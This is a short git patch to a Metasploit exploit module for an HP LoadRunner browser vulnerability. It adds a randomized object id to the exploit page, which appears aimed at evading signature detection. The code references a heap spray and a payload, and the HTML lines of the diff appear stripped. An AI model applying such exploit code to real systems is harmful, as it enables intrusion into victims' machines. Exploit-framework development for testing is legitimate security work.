From f59f57e148bdb505feec9058f7012a4de599b957 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 Aug 2013 10:35:06 -0500 Subject: [PATCH] Randomize object id --- .../windows/browser/hp_loadrunner_writefilebinary.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb index be6eca4e8c..84fa306923 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb @@ -215,6 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) + object_id = rand_text_alpha(rand(10) + 8) html = %Q| @@ -224,9 +225,9 @@ class Metasploit3 < Msf::Exploit::Remote - +